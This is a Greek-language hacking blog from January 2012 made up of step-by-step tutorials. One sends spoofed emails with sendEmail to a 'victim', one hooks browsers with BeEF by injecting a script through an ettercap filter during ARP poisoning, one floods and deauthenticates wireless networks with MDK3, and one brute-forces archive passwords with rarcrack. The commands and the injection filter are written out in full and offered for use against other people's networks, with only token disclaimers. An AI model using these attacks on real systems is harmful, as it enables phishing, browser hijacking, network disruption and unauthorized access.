m{^(!?)(?:(SSL(?:v2|v3|v23|v2/3))|(TLSv1[12]?)&}i     με
m{^(!?)(?:(SSL(?:v2|v3|v23|v2/3))|(TLSv1[12]?))}i
αποθηκευουμε
η εντολη για να στειλουμε ειναι

sendemail -f jennaJemason@pornsar.net -t Thyma@hotmail.com -u Hello Greek Tsolia -m  Jenna is looking for Greek Star are you interesting? -s smtp.gmail.com:587 -xu ********@gmail.com -xp ******* -o tls=yes

  •  ανοιγω ενα τερματικο και γραφω
  • sendEmail -f jennaJemason@pornsar.net -t Thyma@hotmail.com -u Hello Greek Tsolia -m Jenna is looking for Greek Star are you interesting? -s smtp.googlemail.com -xu *******@gmail.com -xp ************
  • οπου
  • -f το email του αποστολεα
  • -t το email του θυματος
  • -u την επικεφαλιδα του μηνυματος
  • -m το μηνυμα
  • -s την υπηρεσια smtp για gmail ειναι αυτη που βλεπετε πανω
  • -xu το gmail σας (καλυτερα να φτιαξετε ενα τυχαιο)
  • -xp ο κωδικος του gmail σας
  • αν θελετε μπορειτε να μην βαλετε την επιλογη -m και θα γραψετε μετα το μηνυμα απλα πρεπει να γραψετε μεσα σε ενα λεπτο την πρωτη γραμμη και μετα οταν γραψετε το υπολοιπο μερος του πατηστε ctrl+d και θα αποσταλθει
  • επισεις αν θελετε να στειλετε συννημενο το στελνετε με την επιλογη -a και ακολουθει η διευθυνση του αρχειου που θελετε να στειλετε πχ sendEmail -f jennaJemason@pornsar.net -t Thyma@hotmail.com -a /root/arxeio -u Hello Greek Tsolia -m Jenna is looking for Greek Tsolia Are you interesting? -s smtp.googlemail.com -xu **********@gmail -xp ***********
  • και στο θυμα θα του εμφανιστει αυτο


  • http://www.sendanonymousemail.net/  και http://emkei.cz/ εδω μπορειτε να στειλετε μεσω του browser σας αν εχετε αλλο λειτουργικο πχ windows,mac κτλ.

 



Τετάρτη 4 Ιανουαρίου 2012

Browser explotation framework (BeEF)Πως εισβαλετε σε υπολογιστη μεσω του browser του


Αυτος ο οδηγος ειναι παρανομος αν εφαρμοστει σε ξενο λειτουργικο συστημα και ξενο δικτυο

Τι θα χρειαστειτε;

1.Backtrack 5 R1
2.Cross-Site-Sctript (xss)


  • πριν αρχισουμε παταμε στην επιφανεια εργασιας μας δεξι κλικ και δημιουργουμε ενα εγγραφο το ονομαζουμε xssbeef, αντιγραφουμε αυτα μεσα
  • #Nickthesail0r
    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
               replace("Accept-Encoding", "Accept-Nothing!");
          }
    }
    if (ip.proto == TCP && tcp.src == 80) {
        if (search(DATA.data, "</head>")) {
            replace("</head>", "</head><script src=\"http://192.168.1.66/beef/hook/beefmagic.js.php\"></script> ");
            msg("EPIASES_LAYRAKI\n");
        }
        if (search(DATA.data, "</HEAD>")) {
            replace("</HEAD>", "</HEAD><script src=\"http://192.168.1.66/beef/hook/beefmagic.js.php\"></script> ");
            msg("epiases_layraki\n");
        }
    }
  • πρεπει να βαλεις την δικια σου ip στο http://192.168.1.66
  • μετα παμε Applications-Backtrack-Explotations tools-Social Engineer tools-Beef xss framework-beef
  • παταω δεξι κλικ στο interface : http://127.0.0.1/beef/ open link και με παει στο γραφικο περιβαλλον του BeEF (στην σελιδα δλδ)

  • αλλαξε το http://127.0.0.1/beef με την δικια σου ip πχ http://192.168.1.66/beef ,πατα apply config και finished 
  • τωρα για να δειτε τι κανει το beEF ακριβως μπορεις να το δοκιμασεις σε εσενα αν πας στο view spawn zombie example
     και θα σας εμφανιστει μια σελιδα που θα λεει beEF test page μην την κλεισετε .πηγαινετε εκει που λεει standard modules και θα δειτε διαφορες επιλογες oπως πχ Alert dialog θα του στελνει μηνυμα

  • και στο χρηστη θα του εμφανιστει αυτο σε οποια σελιδα ειναι και εφοσον ειναι ευαλωτη σε xss 

  • Υπαρχουνε παρα πολλες επιλογες οπως να εισβαλετε στον υπολογιστη του να τον ανακατευθυνετε σε αλλη σελιδα κτλ
  • τωρα πως κανουμε το θυμα να ενωθει μαζι μας;
  • ειναι πολυ ευκολο απλα ανοιγουμε πρωτα ενα τερματικο και γραφουμε
  • etterfilter /root/Desktop/xssbeef -ο xssbeef.ef
  • μας εμφανιζει αυτο
  • etterfilter NG-0.7.4_git copyright 2001-2011 ALoR & NaGA


     12 protocol tables loaded:
        DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

     11 constants loaded:
        VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

     Parsing source file '/root/Desktop/xssbeef'  done.

     Unfolding the meta-tree  done.

     Converting labels to real offsets  done.

     Writing output to 'filter.ef'  done.

     -> Script encoded into 20 instructions.
  • μετα γραφουμε στο τερματικο ettercap -G μας ανοιγει το ettercap σε γραφικη μορφη παταμε shift+u επιλεγουμε wlan0 μετα ctrl+s ,Η επιλεγουμε target 1 το ρουτερ ,παμε mitm,arp poisoning.sniff remote connections παταμε ctrl+f παταμε το εικονιδιο home και επιλεγουμε το xssbeef.ef οπως στην εικονα 
  • τελος παταμε ctrl+w και περιμενουμε μεχρι να δουμε στο ettercap ''epiases_layraki'' οταν το δουμε αυτο παμε στο BeEF βλεπουμε οτι εχουμε zombies(χρηστες) * αν εχετε το ettercap lazarous γραψτε αυτη την εντολη στο τερματικο σας ettercap -T -M arp // // -F '/root/xssbeef.ef'  -i wlan0


Πως θα φτιαξετε τα δικα σας linux

Τι θα χρειαστειτε;

1.Συνδεση στο ιντερνετ

  • πατηστε εδω  καντε εγγραφη και αρχιστε να τα κατασκευαζετε με πολυ ευκολο τροπο
  • start δινετε το ονομα στα linux σας
  • software βαζετε οτι προγραμματα θελετε
  • configuration φτιαχνετε την εμφανιση του linux σας
  • files βαζετε οτι αρχεια θελετε πχ εγω εβαλα φωτογραφιες,και λεξικα για σπασιμο ασυρματω δικτυων
  • build τα κατασκευαζετε και τα κατεβαζετε 
  • αν επιλεξετε test drive τα δοκιμαζετε





  •  Nickthesail0r linux download 
  • κωδικος root/linux

Τρίτη 3 Ιανουαρίου 2012

MDK3 φερτε τον πανικο σε ασυρματα δικτυα

ΠΡΟΣΟΧΗ εφαρμοζοντας αυτον τον οδηγο σε ξενα δικτυα ειναι παρανομος καθως και πολυ ενοχλητικος ΔΕΝ ευθυνομαι για κακοβουλη χρηση του.


Τι θα χρειαστειτε;

1.Backtrack 5 R1

  • ανοιγουμε ενα τερματικο και γραφουμε airmon-ng start wlan0
  • mdk

  •  εδω μας εμφανιζει καποιες επιλογες εγω θα σας δειξω μερικες για να δειτε τι μπορειτε να κανετε
  • Beacon flood mode
  • mdk3 mon0 b  
 - με αυτη την επιλογη μπορειτε να στειλετε ψευτικα δικτυα σε ολη την γειτονια και αν γραψετε mdk3 b --help θα σας εμφανισει διαφορες επιλογες οπως 

  • mdk3 mon0 b -n nickthesail0r  - το ονομα των δικτυων θα λεγετε nickthesail0r
  • mdk3 mon0 b -f /root/diktya.txt -οπου στο αρχειο diktya θα βαλετε εσεις τα ονοματα που θελετε να εκπεμπουνε 
  •  mdk3 mon0 b -t -f /root/diktya.txt -oπου -t θα λεει οτι τα δικτυα μας ειναι με wpa κωδικοποιηση
  • Authentication DoS mode   
  •  mdk3 mon0 a - με αυτη την επιλογη μπορει να παγωσει τα ρουτερ η να τα κανει reset επισεις σας λεει αν καποιο ρουτερ ειναι ευαλωτο και αν θελετε συγκεριμενα για ενα ρουτερ απλα γραψτε mdk3 mon0 a -a mac address του ρουτερ
  •  Deauthentication / Disassociation Amok Mode
  •  mdk3 mon0 d με αυτη την επιλογη αποσυνδεετε ολους του χρηστες που ειναι στην εμβελεια σας 

  •  mdk3 --help d μας δινει διαφορες επιλογες οπως

  •  mdk3 mon0 d -w /root/white.txt οπου στο αρχειο white θα εχω γραψει την mac address μου θα μου επιτρεπει να εχω συνδεση στο ιντερνετ εκτος απο ολους τους αλλους που ειναι στην εμβελεια μου συνηθως το κανετε αυτο αν ειστε σε κοινο χωρο σχολειο,αεροδρομιο κτλ

Πως θα προστατευτειτε;

1.Αλλαξτε τις ρυθμισεις στο ρουτερ σας να μην δεχετε αλλους σταθμους και σε wpa2 αν εχει αυτη την επιλογη
2.Ο καλυτερος τροπος για να προστατευτειτε ειναι να ειστε συνδεδεμενοι ενσυρματα και οχι ασυρματα στο δικτυο σας

Δευτέρα 2 Ιανουαρίου 2012

Πως σπαω κλειδωμενα συμπιεσμενα αρχεια(winrar,7zip,7z)



Τι θα χρειαστειτε;

1.Backtrack 5 R1
2.rarcrack download

  • Αφου εχουμε κατεβασει το rarcrack
  • μεταφερουμε το rarcrack στο φακελο root αν ειναι στο φακελο downloads
  • μετα ανοιγουμε ενα τερματικο και γραφουμε
  • tar -xjf rarcrack-0.2.tar.bz2
  • cd rarcrack-0.2
  • make
  • make install
  • οποτε ειμαστε ετοιμοι 
  • στην συνεχεια γραφουμε cd /root/rarcrack-0.2
  • και μετα ./rarcrack --type rar --threads 8 /root/nickthesail0r.rar και περιμενουμε
  •  παταμε ctrl+c για να κανουμε ποιο συντομη την διαδικασια απλα στο αρχειο nickthesailor.rar.xml που θα μας δημιουργηθει βαζουμε μονο αριθμους η μονο γραμματα  και ξαναρχιζουμε παλι πχ 
  • <?xml version="1.0" encoding="UTF-8"?>
    <rarcrack>
      <abc>0123456789</abc>
      <current>0</current>
      <good_password/>
    </rarcrack>
το αρχειο nickthesail0r.rar θα το βρειτε εδω